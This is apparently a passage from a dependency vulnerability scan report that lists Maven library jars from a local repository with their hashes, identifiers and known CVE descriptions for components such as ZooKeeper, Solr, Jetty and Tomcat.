File Path: /Users/Kevin/.m2/repository/org/apache/calcite/avatica/avatica-core/1.10.0/avatica-core-1.10.0.jar
MD5: de761b429df2ea4988155ba48fb8c225
SHA1: 82280b09d490c7e4981b5af2d79fcf55efbe6144
SHA256:1ba1dd30d5a84b694f652c2dc104497648bb4ee35cf51820ba294cb682c6b46d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.calcite.avatica:avatica-core:1.10.0  Confidence:Highest

commons-exec-1.3.jar

Description:

 Apache Commons Exec is a library to reliably execute external processes from within the JVM.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/commons/commons-exec/1.3/commons-exec-1.3.jar
MD5: 8bb8fa2edfd60d5c7ed6bf9923d14aa8
SHA1: 8dfb9facd0830a27b1b5f29f84593f0aeee7773b
SHA256:cb49812dc1bfb0ea4f20f398bcae1a88c6406e213e67f7524fb10d4f8ad9347b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.commons:commons-exec:1.3  Confidence:Highest

curator-client-2.8.0.jar

Description:

 Low-level API

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/curator/curator-client/2.8.0/curator-client-2.8.0.jar
MD5: c9092076fe5ede652f89465d6a859dfa
SHA1: 84feebaa8526f4984566f6a32f55d7689800acf9
SHA256:80ea85c2db916da0171c93c84418bad429b26b7be716abd331f670e269850dbb
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.curator:curator-client:2.8.0  Confidence:Highest

curator-framework-2.8.0.jar

Description:

 High-level API that greatly simplifies using ZooKeeper.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/curator/curator-framework/2.8.0/curator-framework-2.8.0.jar
MD5: 1ef0e8c00272ceba66741ee16773c5cd
SHA1: f8edc9156084ad19ae50ae5958bf218a08351834
SHA256:955a367d71304944018f1d0cb0ab875ae6957705458b0c66798fb19bf7bc1823
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:zookeeper:2.8.0  Confidence:Low  
  • maven: org.apache.curator:curator-framework:2.8.0  Confidence:Highest

CVE-2016-5017  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

Buffer overflow in the C cli shell in Apache Zookeeper before 3.4.9 and 3.5.x before 3.5.3, when using the "cmd:" batch mode syntax, allows attackers to have unspecified impact via a long command string.

Vulnerable Software & Versions: (show all)

CVE-2018-8012  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-285 Improper Authorization

No authentication/authorization is enforced when a server attempts to join a quorum in Apache ZooKeeper before 3.4.10, and 3.5.0-alpha through 3.5.3-beta. As a result an arbitrary end point could join the cluster and begin propagating counterfeit changes to the leader.

Vulnerable Software & Versions: (show all)

curator-recipes-2.8.0.jar

Description:

 All of the recipes listed on the ZooKeeper recipes doc (except two phase commit).

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/curator/curator-recipes/2.8.0/curator-recipes-2.8.0.jar
MD5: d0cda7ac1d3317646df990366d89110b
SHA1: c563e25fb37f85a6b029bc9746e75573640474fb
SHA256:c527e7fc5f88437ad90bed5f6227ee577a11b36550784d1c066c85d9324a3ca6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.curator:curator-recipes:2.8.0  Confidence:Highest

hadoop-hdfs-2.7.4.jar

Description:

 Apache Hadoop HDFS

File Path: /Users/Kevin/.m2/repository/org/apache/hadoop/hadoop-hdfs/2.7.4/hadoop-hdfs-2.7.4.jar
MD5: e18f429b60662b724cad080b834717a3
SHA1: 3e1414e3ae47e97f66b2eb904d3ec6c50a3e29d0
SHA256:1f3c14c446cf1692b085952b5e186ee817d7aa3011440a38da86140fe1e3d815
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.hadoop:hadoop-hdfs:2.7.4  Confidence:Highest
  • cpe: cpe:/a:apache:hadoop:2.7.4  Confidence:Highest  

CVE-2017-15718  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-255 Credentials Management

The YARN NodeManager in Apache Hadoop 2.7.3 and 2.7.4 can leak the password for credential store provider used by the NodeManager to YARN Applications.

Vulnerable Software & Versions: (show all)

htrace-core-3.2.0-incubating.jar

File Path: /Users/Kevin/.m2/repository/org/apache/htrace/htrace-core/3.2.0-incubating/htrace-core-3.2.0-incubating.jar
MD5: 0b1b1a63aca83a11545de49218a251bf
SHA1: 8797cf3230f01e8724ef27a0ed565dabb6998c64
SHA256:508be2770ef8e83b5c32e19bb56d3fba2ee33c12f7fba25293582ad1595e30bb
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:fasterxml:jackson:3.2.0  Confidence:Low  
  • maven: org.apache.htrace:htrace-core:3.2.0-incubating  Confidence:Highest

httpcore-4.4.1.jar

Description:

 
   Apache HttpComponents Core (blocking I/O)
  

File Path: /Users/Kevin/.m2/repository/org/apache/httpcomponents/httpcore/4.4.1/httpcore-4.4.1.jar
MD5: 27bf6d5323a86a6115b607ce82512d6c
SHA1: f5aa318bda4c6c8d688c9d00b90681dcd82ce636
SHA256:dd1390c17d40f760f7e51bb20523a8d63deb69e94babeaf567eb76ecd2cad422
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.httpcomponents:httpcore:4.4.1  Confidence:Highest

httpmime-4.4.1.jar

Description:

 
   Apache HttpComponents HttpClient - MIME coded entities
  

File Path: /Users/Kevin/.m2/repository/org/apache/httpcomponents/httpmime/4.4.1/httpmime-4.4.1.jar
MD5: 678b75d71032e823480a41123b6b3ce2
SHA1: 2f8757f5ac5e38f46c794e5229d1f3c522e9b1df
SHA256:e6b8ca9e2b9d9e1fded549c0a3cb7471a431d83294342ae1618b876113a59840
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.httpcomponents:httpmime:4.4.1  Confidence:Highest

zookeeper-3.4.10.jar

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/zookeeper/zookeeper/3.4.10/zookeeper-3.4.10.jar
MD5: 550ce0afeb92ef4a75f194b143e23995
SHA1: 08eebdbb7a9df83e02eaa42d0e5da0b57bf2e4da
SHA256:caa38ce6b2f52c59c10b80f89abb544cc4279257805fc0c969010cbab1a11079
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.zookeeper:zookeeper:3.4.10  Confidence:Highest
  • cpe: cpe:/a:apache:zookeeper:3.4.10  Confidence:Low  

CVE-2018-8012  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-285 Improper Authorization

No authentication/authorization is enforced when a server attempts to join a quorum in Apache ZooKeeper before 3.4.10, and 3.5.0-alpha through 3.5.3-beta. As a result an arbitrary end point could join the cluster and begin propagating counterfeit changes to the leader.

Vulnerable Software & Versions: (show all)

jackson-core-asl-1.9.13.jar

Description:

 Jackson is a high-performance JSON processor (parser, generator)

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/codehaus/jackson/jackson-core-asl/1.9.13/jackson-core-asl-1.9.13.jar
MD5: 319c49a4304e3fa9fe3cd8dcfc009d37
SHA1: 3c304d70f42f832e0a86d45bd437f692129299a4
SHA256:440a9cb5ca95b215f953d3a20a6b1a10da1f09b529a9ddea5f8a4905ddab4f5a
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:fasterxml:jackson:1.9.13  Confidence:Low  
  • maven: org.codehaus.jackson:jackson-core-asl:1.9.13  Confidence:Highest

commons-compiler-2.7.6.jar

Description:

 Janino is a super-small, super-fast Java compiler.

License:

http://dist.codehaus.org/janino/new_bsd_license.txt
File Path: /Users/Kevin/.m2/repository/org/codehaus/janino/commons-compiler/2.7.6/commons-compiler-2.7.6.jar
MD5: b729cc841ca68ecf82dd8b035196a28a
SHA1: b71e76d942b33dfa26e4e3047ff2a774d1f917b4
SHA256:ef505581b345821e9c28c049745683514ec87642a50d06da605f60d9c8e38792
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.janino:commons-compiler:2.7.6  Confidence:Highest

janino-2.7.6.jar

Description:

 Janino is a super-small, super-fast Java compiler.

License:

http://dist.codehaus.org/janino/new_bsd_license.txt
File Path: /Users/Kevin/.m2/repository/org/codehaus/janino/janino/2.7.6/janino-2.7.6.jar
MD5: 887a4a895315470f4ddf3203ef4cb115
SHA1: 37fde5de7edd5d7ebe075f03f4c083df2ac73dd8
SHA256:8818cc9e4076d8c52f3a00cc7650caefeb3a40638cab9ff5fa8cfe188c74463d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.janino:janino:2.7.6  Confidence:Highest

stax2-api-3.1.4.jar

Description:

 tax2 API is an extension to basic Stax 1.0 API that adds significant new functionality, such as full-featured bi-direction validation interface and high-performance Typed Access API.
  

License:

The BSD License: http://www.opensource.org/licenses/bsd-license.php
File Path: /Users/Kevin/.m2/repository/org/codehaus/woodstox/stax2-api/3.1.4/stax2-api-3.1.4.jar
MD5: c08e89de601b0a78f941b2c29db565c3
SHA1: ac19014b1e6a7c08aad07fe114af792676b685b7
SHA256:86d7c0b775a7c9b454cc6ba61d40a8eb3b99cc129f832eb9b977a3755b4b338e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.woodstox:stax2-api:3.1.4  Confidence:Highest

woodstox-core-asl-4.4.1.jar

Description:

 Woodstox is a high-performance XML processor that
implements Stax (JSR-173) and SAX2 APIs

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/codehaus/woodstox/woodstox-core-asl/4.4.1/woodstox-core-asl-4.4.1.jar
MD5: 1f53f91f117288fb2ef2e120f27e5498
SHA1: 84fee5eb1a4a1cefe65b6883c73b3fa83be3c1a1
SHA256:274fa403ed08c0d6f2f574dc1916adaaaec9a493e56d6442f8797ede620bca65
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.woodstox:woodstox-core-asl:4.4.1  Confidence:Highest

jetty-io-9.3.14.v20161028.jar

Description:

 Jetty module for Jetty :: IO Utility

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/jetty-io/9.3.14.v20161028/jetty-io-9.3.14.v20161028.jar
MD5: 4d3aefe94291b3701779aa33076d20e1
SHA1: 52d796b58c3a997e59e6b47c4bf022cedcba3514
SHA256:23e6676cf9de936f65214e6cef0e07ae5bd1ec4711fe40c3887b0ba3b0d4a7aa
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.jetty:jetty-io:9.3.14.v20161028  Confidence:Highest

jetty-jmx-9.3.14.v20161028.jar

Description:

 JMX management artifact for jetty.

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/jetty-jmx/9.3.14.v20161028/jetty-jmx-9.3.14.v20161028.jar
MD5: 7517599ae46f1f22491f6701beeeec41
SHA1: d4829a57973c36f117792455024684bb6a5202aa
SHA256:4514f891b993b7ef57c6c40c3c47f6b1b46039b0e1c3acd5e6f9c6234f55a089
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:jetty:jetty:9.3.14.v20161028  Confidence:Low  
  • maven: org.eclipse.jetty:jetty-jmx:9.3.14.v20161028  Confidence:Highest
  • cpe: cpe:/a:eclipse:jetty:9.3.14.v20161028  Confidence:Low  

CVE-2017-9735  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Jetty through 9.4.x is prone to a timing channel in util/security/Password.java, which makes it easier for remote attackers to obtain access by observing elapsed times before rejection of incorrect passwords.

Vulnerable Software & Versions:

spatial4j-0.6.jar

Description:

 
    Spatial4j is a general purpose spatial / geospatial ASL licensed open-source Java library. It's
    core capabilities are 3-fold: to provide common geospatially-aware shapes, to provide distance
    calculations and other math, and to read shape formats like WKT and GeoJSON.
  

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/locationtech/spatial4j/spatial4j/0.6/spatial4j-0.6.jar
MD5: baaffe1b4800337f0856c6160c255c35
SHA1: 21b15310bddcfd8c72611c180f20cf23279809a3
SHA256:365c2904230f1fdf42de6fd81f21fd806f7e095d0395fa4449e1a2d6751861ea
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.locationtech.spatial4j:spatial4j:0.6  Confidence:Highest

noggit-0.8.jar

Description:

 Noggit is the world's fastest streaming JSON parser for Java.

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/noggit/noggit/0.8/noggit-0.8.jar
MD5: 6856f2ceab2dd7128595e4659d22d581
SHA1: ba4ad65a62d7dfcf97a8d42c82ae7d8824f9087f
SHA256:dd9901c7d72ffd97d952271e3c486ddc9c78dd25a74db69ddbf2670431c7c81f
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.noggit:noggit:0.8  Confidence:Highest

asm-commons-5.1.jar

File Path: /Users/Kevin/.m2/repository/org/ow2/asm/asm-commons/5.1/asm-commons-5.1.jar
MD5: 38839fb32c40f7f70986e9c282de0018
SHA1: 25d8a575034dd9cfcb375a39b5334f0ba9c8474e
SHA256:97b3786e1f55e74bddf8ad102bf50e33bbcbc1f6b7fd7b36f0bbbb25cd4981be
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.ow2.asm:asm-commons:5.1  Confidence:Highest

jcl-over-slf4j-1.7.7.jar

Description:

 JCL 1.1.1 implemented over SLF4J

File Path: /Users/Kevin/.m2/repository/org/slf4j/jcl-over-slf4j/1.7.7/jcl-over-slf4j-1.7.7.jar
MD5: 32ad130f946ef0460af416397b7fc7b7
SHA1: 56003dcd0a31deea6391b9e2ef2f2dc90b205a92
SHA256:c6472b5950e1c23202e567c6334e4832d1db46fad604b7a0d7af71d4a014bce2
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:slf4j:slf4j:1.7.7  Confidence:Low  
  • maven: org.slf4j:jcl-over-slf4j:1.7.7  Confidence:Highest

solr-core-7.0.1.jar

Description:

 Apache Solr Core

File Path: /Users/Kevin/.m2/repository/org/apache/solr/solr-core/7.0.1/solr-core-7.0.1.jar
MD5: 5c9f20959e2f17b72b683b1a7098f7dd
SHA1: 8aa47f1a9b4758cf81eac0b545b5e99d84a977dc
SHA256:2626736f1494323e13a560c637ec80cc8d2b687253008013bbb86c07a769aac5
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:solr:7.0.1  Confidence:Highest  
  • maven: org.apache.solr:solr-core:7.0.1  Confidence:Highest

CVE-2017-12629  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.

Vulnerable Software & Versions: (show all)

CVE-2018-1308  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

This vulnerability in Apache Solr 1.2 to 6.6.2 and 7.0.0 to 7.2.1 relates to an XML external entity expansion (XXE) in the `&dataConfig=<inlinexml>` parameter of Solr's DataImportHandler. It can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network.

Vulnerable Software & Versions: (show all)

CVE-2018-8010  

Severity:Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

This vulnerability in Apache Solr 6.0.0 to 6.6.3, 7.0.0 to 7.3.0 relates to an XML external entity expansion (XXE) in Solr config files (solrconfig.xml, schema.xml, managed-schema). In addition, Xinclude functionality provided in these config files is also affected in a similar way. The vulnerability can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. Users are advised to upgrade to either Solr 6.6.4 or Solr 7.3.1 releases both of which address the vulnerability. Once upgrade is complete, no other steps are required. Those releases only allow external entities and Xincludes that refer to local files / zookeeper resources below the Solr instance directory (using Solr's ResourceLoader); usage of absolute URLs is denied. Keep in mind, that external entities and XInclude are explicitly supported to better structure config files in large installations. Before Solr 6 this was no problem, as config files were not accessible through the APIs.

Vulnerable Software & Versions: (show all)

CVE-2018-8026  

Severity:Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

This vulnerability in Apache Solr 6.0.0 to 6.6.4 and 7.0.0 to 7.3.1 relates to an XML external entity expansion (XXE) in Solr config files (currency.xml, enumsConfig.xml referred from schema.xml, TIKA parsecontext config file). In addition, Xinclude functionality provided in these config files is also affected in a similar way. The vulnerability can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. The manipulated files can be uploaded as configsets using Solr's API, allowing to exploit that vulnerability.

Vulnerable Software & Versions: (show all)

umlet-12.0.jar

License:

GNU GENERAL PUBLIC LICENSE: http://www.gnu.org/licenses/gpl.html
File Path: /Users/Kevin/.m2/repository/com/umlet/umlet/12.0/umlet-12.0.jar
MD5: 22b278ab918a3b1cce2cb1c10b44516a
SHA1: 507cb009ff54ce4186bc97f615e0dbaa4b546ba2
SHA256:68aec104c016b537de79f8eea8599d1ce1a1ea03a434ae56965d6b0360f0b054
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.umlet:umlet:12.0  Confidence:Highest

tomcat-juli-7.0.42.jar

Description:

 Tomcat Core Logging Package

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/tomcat/tomcat-juli/7.0.42/tomcat-juli-7.0.42.jar
MD5: ff8d7673a10e6aca13d2ac9ab91998a1
SHA1: f0049ac94514d69231c41ed96238efb94ffdd9cf
SHA256:0c044e6b88caceb49cf1dcb8ecbd0a8cfde574c5af3d5090143607618bd5f680
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache_software_foundation:tomcat:7.0.42  Confidence:Low  
  • maven: org.apache.tomcat:tomcat-juli:7.0.42  Confidence:Highest

tomcat-annotations-api-7.0.42.jar

Description:

 Annotations Package

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/tomcat/tomcat-annotations-api/7.0.42/tomcat-annotations-api-7.0.42.jar
MD5: 271b5ff84d2935a412289651cc7d9e9e
SHA1: 6fc6cc449c216e861c22ad00062ed1e6333179a5
SHA256:bc2c73407ecfe003f3da8ae64dc231bc9e882cae0f76c7e81b29a08f7647d8a4
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.tomcat:tomcat-annotations-api:7.0.42  Confidence:Highest

tomcat-api-7.0.42.jar

Description:

 Definition of interfaces shared by Catalina and Jasper

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/tomcat/tomcat-api/7.0.42/tomcat-api-7.0.42.jar
MD5: 55465a546c4a8528b0c9c7f009d6597b
SHA1: 9d67cf4dbe291c2de61b8e03445cfc87dcd6f580
SHA256:9647161c81c64bbf464f1a5e13cf96a5e2a27f61c4854cfb13464bc3e1bfb34b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.tomcat:tomcat-api:7.0.42  Confidence:Highest
  • cpe: cpe:/a:apache_software_foundation:tomcat:7.0.42  Confidence:Low  
  • cpe: cpe:/a:apache_tomcat:apache_tomcat:7.0.42  Confidence:Low  
  • cpe: cpe:/a:apache:tomcat:7.0.42  Confidence:Highest  

CVE-2013-0346  

Severity:Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

** DISPUTED ** Apache Tomcat 7.x uses world-readable permissions for the log directory and its files, which might allow local users to obtain sensitive information by reading a file.  NOTE: One Tomcat distributor has stated "The tomcat log directory does not contain any sensitive information."

Vulnerable Software & Versions: (show all)

CVE-2013-4286  

Severity:Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)
CWE: CWE-20 Improper Input Validation

Apache Tomcat before 6.0.39, 7.x before 7.0.47, and 8.x before 8.0.0-RC3, when an HTTP connector or AJP connector is used, does not properly handle certain inconsistent HTTP request headers, which allows remote attackers to trigger incorrect identification of a request's length and conduct request-smuggling attacks via (1) multiple Content-Length headers or (2) a Content-Length header and a "Transfer-Encoding: chunked" header.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2005-2090.

Vulnerable Software & Versions: (show all)

CVE-2013-4322  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-RC10 processes chunked transfer coding without properly handling (1) a large total amount of chunked data or (2) whitespace characters in an HTTP header value within a trailer field, which allows remote attackers to cause a denial of service by streaming data.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-3544.

Vulnerable Software & Versions: (show all)

CVE-2013-4590  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-RC10 allows attackers to obtain "Tomcat internals" information by leveraging the presence of an untrusted web application with a context.xml, web.xml, *.jspx, *.tagx, or *.tld XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

Vulnerable Software & Versions: (show all)

CVE-2014-0050  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.

Vulnerable Software & Versions: (show all)

CVE-2014-0075  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Integer overflow in the parseChunkHeader function in java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 allows remote attackers to cause a denial of service (resource consumption) via a malformed chunk size in chunked transfer coding of a request during the streaming of data.

Vulnerable Software & Versions: (show all)

CVE-2014-0096  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

java/org/apache/catalina/servlets/DefaultServlet.java in the default servlet in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 does not properly restrict XSLT stylesheets, which allows remote attackers to bypass security-manager restrictions and read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

Vulnerable Software & Versions: (show all)

CVE-2014-0099  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-189 Numeric Errors

Integer overflow in java/org/apache/tomcat/util/buf/Ascii.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4, when operated behind a reverse proxy, allows remote attackers to conduct HTTP request smuggling attacks via a crafted Content-Length HTTP header.

Vulnerable Software & Versions: (show all)

CVE-2014-0119  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

Apache Tomcat before 6.0.40, 7.x before 7.0.54, and 8.x before 8.0.6 does not properly constrain the class loader that accesses the XML parser used with an XSLT stylesheet, which allows remote attackers to (1) read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, or (2) read files associated with different web applications on a single Tomcat instance via a crafted web application.

Vulnerable Software & Versions: (show all)

CVE-2014-0227  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)
CWE: CWE-19 Data Processing Errors

java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat 6.x before 6.0.42, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle attempts to continue reading data after an error has occurred, which allows remote attackers to conduct HTTP request smuggling attacks or cause a denial of service (resource consumption) by streaming data with malformed chunked transfer coding.

Vulnerable Software & Versions: (show all)

CVE-2014-0230  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-399 Resource Management Errors

Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle cases where an HTTP response occurs before finishing the reading of an entire request body, which allows remote attackers to cause a denial of service (thread consumption) via a series of aborted upload attempts.

Vulnerable Software & Versions: (show all)

CVE-2014-7810  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

The Expression Language (EL) implementation in Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.58, and 8.x before 8.0.16 does not properly consider the possibility of an accessible interface implemented by an inaccessible class, which allows attackers to bypass a SecurityManager protection mechanism via a web application that leverages use of incorrect privileges during EL evaluation.

Vulnerable Software & Versions: (show all)

CVE-2015-5174  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Directory traversal vulnerability in RequestUtil.java in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.65, and 8.x before 8.0.27 allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call, as demonstrated by the $CATALINA_BASE/webapps directory.

Vulnerable Software & Versions: (show all)

CVE-2015-5345  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The Mapper component in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.30, and 9.x before 9.0.0.M2 processes redirects before considering security constraints and Filters, which allows remote attackers to determine the existence of a directory via a URL that lacks a trailing / (slash) character.

Vulnerable Software & Versions: (show all)

CVE-2015-5346  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

Session fixation vulnerability in Apache Tomcat 7.x before 7.0.66, 8.x before 8.0.30, and 9.x before 9.0.0.M2, when different session settings are used for deployments of multiple versions of the same web application, might allow remote attackers to hijack web sessions by leveraging use of a requestedSessionSSL field for an unintended request, related to CoyoteAdapter.java and Request.java.

Vulnerable Software & Versions: (show all)

CVE-2015-5351  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)

The (1) Manager and (2) Host Manager applications in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 establish sessions and send CSRF tokens for arbitrary new requests, which allows remote attackers to bypass a CSRF protection mechanism by using a token.

Vulnerable Software & Versions: (show all)

CVE-2016-0706  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, and consequently discover session ID values, via a crafted web application.

Vulnerable Software & Versions: (show all)

CVE-2016-0714  

Severity:Medium
CVSS Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The session-persistence implementation in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 mishandles session attributes, which allows remote authenticated users to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that places a crafted object in a session.

Vulnerable Software & Versions: (show all)

CVE-2016-0762  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

